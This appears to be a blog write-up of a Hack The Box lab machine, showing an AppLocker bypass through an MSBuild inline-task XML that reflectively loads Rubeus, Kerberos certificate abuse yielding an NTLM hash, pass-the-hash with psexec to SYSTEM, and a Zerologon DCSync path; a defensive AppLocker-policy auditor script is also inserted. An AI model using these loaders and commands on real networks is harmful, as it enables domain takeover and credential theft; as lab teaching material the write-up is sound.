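Around 2012, to counter the growing threat, Microsoft needed to strike a balance between "powerful features" and "system security", and so introduced Constrained Language Mode in PowerShell 3.0. Its design intent: when a user constrained by an application control policy (such as AppLocker or Windows Defender Application Control, WDAC) runs PowerShell, the session is automatically switched to ConstrainedLanguage mode. That way, even an attacker who controls the user's privileges cannot use PowerShell's advanced features to execute malicious code or load unauthorized assemblies, which greatly improves the security of the system.

$ExecutionContext.SessionState.LanguageMode shows the language mode of the current session.

Rubeus can still be downloaded with curl, though: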

*Evil-WinRM* PS C:\programdata> curl http://10.10.16.5/Rubeus.exe -o 1.exe

Run Rubeus:

*Evil-WinRM* PS C:\programdata> ./1.exe
Program '1.exe' failed to run: This program is blocked by group policy. For more information, contact your system 

Execution is blocked by AppLocker. We can view its configuration:

*Evil-WinRM* PS C:\programdata> Get-AppLockerPolicy -Effective -Xml
...[omitted]...
<FilePathRule ... UserOrGroupSid="S-1-1-0" Action="Allow">
    <Conditions>
      <FilePathCondition Path="%OSDRIVE%\tmp\*"/>
    </Conditions>
  </FilePathRule>
...[omitted]...

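This means anyone can run executables under C:\tmp, but the tmp directory does not exist. Now consider trying to bypass AppLocker.

Living Off the Land: when the target system uses an allow-list policy such as AppLocker to restrict unknown programs, we look for programs that the system itself allows to run and that are signed by Microsoft to execute the malicious code. MSBuild.exe is a typical example.

MSBuild supports "inline tasks", which allow C# code to be embedded directly in an XML project file and executed. The system checks the identity of MSBuild.exe, the "proxy", and does not stop the inline task it compiles and runs in memory. The malicious code actually runs inside the trusted MSBuild process, which bypasses AppLocker's checks on unknown .exe files.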
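
An added example, not part of the original post: a small audit over the XML that Get-AppLockerPolicy -Effective -Xml returns, flagging the two weaknesses this section runs into, a broad allow rule on a path outside the default roots and MSBuild.exe being runnable with no deny rule. The policy text is constructed (only the %OSDRIVE%\tmp\* rule comes from the page), and the rule Ids and function names are placeholders.

```python
import xml.etree.ElementTree as ET

BROAD_SIDS = {"S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users",
              "S-1-5-32-545": "BUILTIN\\Users"}
# Roots used by AppLocker's default path rules; any other path granted to a
# broad group deserves review.
PROTECTED = ("%windir%\\", "%system32%\\", "%programfiles%\\")

# Constructed rules. Real policies use GUIDs for Id; "r1".. are placeholders.
DEFAULT_RULES = r"""
    <FilePathRule Id="r1" Name="Program Files" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="r2" Name="Windows" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="r3" Name="Admins" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*"/></Conditions>
    </FilePathRule>"""
TMP_RULE = r"""
    <FilePathRule Id="r4" Name="tmp" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%OSDRIVE%\tmp\*"/></Conditions>
    </FilePathRule>"""
DENY_MSBUILD = r"""
    <FilePublisherRule Id="r5" Name="Block MSBuild" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions>
        <FilePublisherCondition PublisherName="O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US"
                                ProductName="*" BinaryName="MSBUILD.EXE">
          <BinaryVersionRange LowSection="*" HighSection="*"/>
        </FilePublisherCondition>
      </Conditions>
    </FilePublisherRule>"""


def policy(*rules):
    """Wrap rule fragments in an enforced Exe rule collection."""
    return ('<AppLockerPolicy Version="1"><RuleCollection Type="Exe" EnforcementMode="Enabled">'
            + "".join(rules) + "</RuleCollection></AppLockerPolicy>")


WEAK = policy(DEFAULT_RULES, TMP_RULE)          # shape of the policy seen on the page
HARDENED = policy(DEFAULT_RULES, DENY_MSBUILD)  # tmp rule dropped, MSBuild denied


def targets(rule, part):
    """Lower-cased paths and binary names under a rule's <Conditions> or <Exceptions>."""
    node = rule.find(part)
    if node is None:
        return []
    found = [c.get("Path", "") for c in node.iter("FilePathCondition")]
    found += [c.get("BinaryName", "") for c in node.iter("FilePublisherCondition")]
    return [f.lower() for f in found if f]


def covers(names, binary):
    """True if a path or publisher condition names this binary."""
    return any(n == binary or n.endswith("\\" + binary) for n in names)


def audit_exe_rules(xml_text, lolbins=("msbuild.exe",)):
    """Return (finding, detail) pairs for the Exe rule collection."""
    findings = []
    for coll in ET.fromstring(xml_text).iter("RuleCollection"):
        if coll.get("Type") != "Exe":
            continue
        if coll.get("EnforcementMode") != "Enabled":
            findings.append(("exe-rules-not-enforced", coll.get("EnforcementMode", "NotConfigured")))
        blocked, windir_open = [], False
        for rule in coll:
            if rule.get("Action") == "Deny":
                blocked += targets(rule, "Conditions")
                continue
            who = BROAD_SIDS.get(rule.get("UserOrGroupSid"))
            if who is None:
                continue  # allow rule scoped to a narrower group
            cond = rule.find("Conditions")
            for c in (cond.iter("FilePathCondition") if cond is not None else ()):
                path = c.get("Path", "")
                if path.lower() == "%windir%\\*":
                    windir_open = True
                    blocked += targets(rule, "Exceptions")  # carve-outs from the allow
                elif not path.lower().startswith(PROTECTED):
                    findings.append(("broad-allow-outside-protected-path", f"{who}: {path}"))
        if windir_open:
            findings += [("signed-binary-not-blocked", b) for b in lolbins
                         if not covers(blocked, b)]
    return findings


if __name__ == "__main__":
    print("weak:", audit_exe_rules(WEAK))
    print("hardened:", audit_exe_rules(HARDENED))
```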

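Completely "liquefy" Rubeus: convert it to a Base64 string stored in a text file, which MSBuild.exe reads and then "reassembles" and runs directly in memory.

On the attacking machine, run: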

$ base64 -w 0 Rubeus.exe > rubeus_b64.txt

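The PFX file generated earlier has no password; we need to set one to avoid ambiguity in how .NET handles empty passwords. Also, the OpenSSL version we use is fairly new and by default generates .pfx files with the newest encryption algorithms (such as AES256-SHA256). The target system is older, and the .NET 4.0/4.6 it runs cannot recognize these new algorithms at all, so a highly compatible PFX is needed.

# convert directly from the old pfx (extract first, then repackage)
openssl pkcs12 -in administrator.pfx -nodes -out temp.pem
openssl pkcs12 -export -in temp.pem -out legacy_admin.pfx -password pass:1234 -legacy
rm temp.pem

The XML below reads rubeus_b64.txt from disk, loads it in memory, and runs the asktgt command.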

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="ExecuteRubeusInMemory">
    <RubeusTask />
  </Target>
  <UsingTask
    TaskName="RubeusTask"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Reflection;
        using System.IO;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;

        public class RubeusTask : Task, ITask
        {
          public override bool Execute()
          {
            try {
                string b64Path = @"C:\programdata\rubeus_b64.txt";
                if (!File.Exists(b64Path)) {
                    Console.WriteLine("[-] error: not found rubeus_b64.txt");
                    return false;
                }

                Console.WriteLine("[*] read Base64.txt...");
                string b64Data = File.ReadAllText(b64Path);
                byte[] rubeusBytes = Convert.FromBase64String(b64Data);

                Console.WriteLine("[*] (Reflection Load)...");
                Assembly rubeusAssembly = Assembly.Load(rubeusBytes);

                string[] rubeusArgs = new string[] { 
                  "asktgt", 
                  "/user:administrator",
                  "/domain:htb.local",
                  "/dc:10.129.6.66",
                  "/certificate:C:\\programdata\\legacy_admin.pfx",
                  "/password:1234",
                  "/getcredentials",
                  "/outfile:C:\\programdata\\admin.kirbi"
                };

                Console.WriteLine("[*] Rubeus start...");
                Console.WriteLine("--------------------------------------");

                rubeusAssembly.EntryPoint.Invoke(null, new object[] { rubeusArgs });

                Console.WriteLine("--------------------------------------");
                Console.WriteLine("[+] okkk! NTLM Hash。");
                return true;
            }
            catch (Exception ex) {
                Console.WriteLine("[-] 发生异常: " + ex.Message);
                if (ex.InnerException != null) {
                    Console.WriteLine("[-] 内部异常: " + ex.InnerException.Message);
                }
                return false;
            }
          }
        }
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

Upload payload.xml, legacy_admin.pfx and rubeus_b64.txt to C:\programdata\ on the target.

Now run MSBuild.exe:

*Evil-WinRM* PS C:\programdata> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\programdata\payload.xml
Microsoft (R) Build Engine version 4.6.1586.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.

[*] read Base64.txt...
[*] (Reflection Load)...
[*] Rubeus start...
--------------------------------------

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Amanda
[*] Building AS-REQ (w/ PKINIT preauth) for: 'htb.local\administrator'
[*] Using domain controller: 10.129.6.66:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

  ServiceName              :  krbtgt/htb.local
  ServiceRealm             :  HTB.LOCAL
  UserName                 :  administrator (NT_PRINCIPAL)
  UserRealm                :  HTB.LOCAL
  StartTime                :  3/19/2026 9:39:04 AM
  EndTime                  :  3/19/2026 7:39:04 PM
  RenewTill                :  3/26/2026 9:39:04 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  nWXDusmX1zaSL+l35K+ALQ==
  ASREP (key)              :  A4A16318248D92616279308194135CE1

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : F6B7160BFC91823792E0AC3A162C9267
--------------------------------------
[+] okkk! NTLM Hash。

Build succeeded.
    0 Warning(s)
    0 Error(s)

Time Elapsed 00:00:02.98

The PFX file obtained through ADCS template injection successfully yielded a Kerberos ticket and the NTLM hash.

Getting SYSTEM

Log in directly with the NTLM hash:

$ psexec.py -hashes ':F6B7160BFC91823792E0AC3A162C9267' htb.local/administrator@htb.local
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file jfcQLsrd.exe
[*] Opening SVCManager on htb.local.....
[*] Creating service pzJM on htb.local.....
[*] Starting service pzJM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

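So from the first foothold we went straight to SYSTEM. Both flags can now be collected.

Bonus

There is another unintended path. CVE-2020-1472 can be used to reset the machine account's password to empty, after which DCSync is possible.

Identify: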

$ sudo nxc smb htb.local -u '' -p '' -M zerologon

Attack:

$ sudo python3 cve-2020-1472-exploit.py SIZZLE 10.129.6.66
$ sudo impacket-secretsdump -no-pass -just-dc htb.local/SIZZLE\$@10.129.6.66
posted @ 2026-03-19 21:57  Merakii